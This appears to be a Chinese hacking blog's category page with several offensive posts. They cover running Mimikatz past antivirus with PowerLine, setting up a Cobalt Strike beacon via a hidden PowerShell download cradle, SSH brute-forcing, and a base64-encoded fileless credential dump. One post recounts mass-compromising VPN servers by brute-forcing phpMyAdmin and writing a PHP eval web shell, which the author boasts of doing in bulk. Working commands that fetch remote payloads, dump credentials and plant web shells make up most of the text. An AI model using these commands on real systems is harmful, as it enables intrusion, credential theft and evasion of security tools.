分类 网络安全 下的文章

Powershell AV Evasion. Running Mimikatz with PowerLine

PowerShell默认存在于所有Windows 7+上,并且正在成为在Windows中执行所需脚本的最常用方法。因此产品开始阻止或警告PowerShell的使用。
网络上也有很多关于ps的混淆脚本和混淆技巧,对于国内的一些杀毒其实已经够了,但是如果遇到了比如eset/avast等杀毒就会被拦截了。
经过测试,检查防病毒是否检测到此行为,因此在执行阶段就已经失效。
图片1.png

Powerline是由Brian Fehrman(@fullmetalcache)创建的一个很棒的工具,允许调用PowerShell脚本。它是用C#编写的(不直接调用PowerShell),可以完全从命令行使用。

构建和使用:
部署构建很简单
1、从github下载代码https://github.com/fullmetalcache/PowerLine
2、运行build.bat
3、更新UserConf.xml文档以包含您要包含的ps脚本的URL
4、运行plbuilder.exe,powerline.exe生成成功
使用:
当你构件好powerline后接下来就是把powerline.exe放到目标机器上。可以通过shell上传或者远程下载功能。

certutil -urlcache -split -f http://atackerIP/PowerLine.exe PowerLine.exe

上传后执行(默认的userconf.xml中带的是invoke-mimikatz):

PowerLine.exe Invoke-Mimikatz "Invoke-Mimikatz -Command \"`\"privilege::debug`\" `\"sekurlsa::logonPasswords`\"\""

Avast(图片来自引用博客):
图片2.png
国内杀毒(图片来自本地测试):
图片3.png
可以看到已经达到了绕过的需求。
可以通过修改默认导入的ps脚本来满足不同环境下的需求。

https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

引用:

    https://github.com/fullmetalcache/PowerLine/blob/master/README.md
 https://jlajara.gitlab.io/posts/2019/01/27/Mimikatz-AV-Evasion.html

Cobalt Strike安装使用并回弹一个shell
Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。
Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。也是一个C/S结构的工具
首先登陆远程服务器,cs是一个团队协作的工具,而且可以隐藏后端攻击者ip,所以远程登录到服务器上,并安装java8
QQ20190331-140757@2x.png
在服务器上执行
./teamserver 10.14.4.16 123
ip是你服务器的公网/内网地址 123是连接密码
QQ20190331-140812@2x.png
在客户端上运行。
QQ20190331-140827@2x.png
用户名随意,密码123
连接后
QQ20190331-140835@2x.png
这就已经成功连接到服务器上了。
QQ20190331-140843@2x.png
接下来创建一个监听事件
QQ20190331-140851@2x.png
在这里创建一个监听事件,监听端口选择8088
QQ20190331-140858@2x.png
beacon的地址也选择外网地址反射回的,如果前端没有其他转发服务器的话。
QQ20190331-140904@2x.png

监听建立成功。
接下来生成shell
attacks》web drive-by》
QQ20190331-140918@2x.png

目标机器是win7,那么我使用powershell来远程下载。
QQ20190331-140939@2x.png
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.14.4.16:80/aaaa'))"

生成代码已经给出了
QQ20190331-140946@2x.png
在win下执行命令
QQ20190331-141000@2x.png
可以看到,已经上线了。
稍后可能会写怎么绕过火绒的提醒,执行shell

利用python-pxssh实现ssh暴力破解,昨天的文章中完成了利用pexpect来执行登录ssh的操作,今天利用pxssh来进行暴力破解,pxssh是一个在pexpect库中的专用脚本,不需要单独安装,有的python版本可以直接import pxssh,有的则需要from pexpect import pxssh 来进行包含,这个根据各自版本进行修改。我的是后者的方式。
源码如下:(存在word中了。。。。代码就成两行,就截图了)

QQ20190331-133949@2x.png
QQ20190331-134100@2x.png
QQ20190331-134114@2x.png
QQ20190331-134124@2x.png

上一篇文章说篇幅太少,其实操作就那样,没必要一步一步的说明,有的朋友给我发邮件私聊了下,很简单就复现了。

接下来正文,之前发现某些免流脚本,都是默认密码,数据库管理都是phpmyadmin,lnmp自动安装的,有些选项都没有让用户自己填写,导致了批量shell。简介就是这样。坛子里好像是有过入侵的,不过是通过burp爆破phpmyadmin。通用了一下,大家就明白了吧。
首先我了解到免流的web服务通常使用1234端口和808端口,那么开始找腾讯云的ip段进行扫描。

QQ20190331-132728@2x.png

扫描后复制下来保存到记事本中,批量处理下后缀名。
QQ20190331-132735@2x.png
保存ip之后导入,设置用户名,密码字典等。
QQ20190331-132742@2x.png
QQ20190331-132750@2x.png
开始爆破。
爆破之后导出ip和密码
QQ20190331-132800@2x.png
之前有过某个做黑产的牛发的扫过的。
逐条打开测试
QQ20190331-132809@2x.png
登陆phpmyadmin
点击sql,既然是mysql的root权限,那就可以通过找到绝对路径后写shell,
而脚本安装都是统一的目录,而且安装的是lnmp环境。So

 select '<?php @eval($_POST[1111])?>' into outfile '/home/wwwroot/default/admin/index1.php'

一句话写入,这样的话可以用菜刀连接了
QQ20190331-132818@2x.png

这是之前搞得12月份的批量,基本两个小时。

绕过杀毒执行ps-实现无文件落地导hash

直接执行。三款国内杀毒只有360拦截了执行。
powershell "IEX (New-Object Net.WebClient).DownloadString(‘http://xxxx.xx/Invoke-Mimikatz.ps1’); Invoke-Mimikatz -DumpCreds"
QQ20190330-235519@2x.png
Base64编码后执行
$text = 'Hello World!'

替换Hello World!

powershell.exe -eNco SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwA=

替换后执行。
QQ20190331-131609@2x.png
绕过并导出了hash。这个办法在2008、win7上遇到装有360等国内杀毒的时候可以尝试下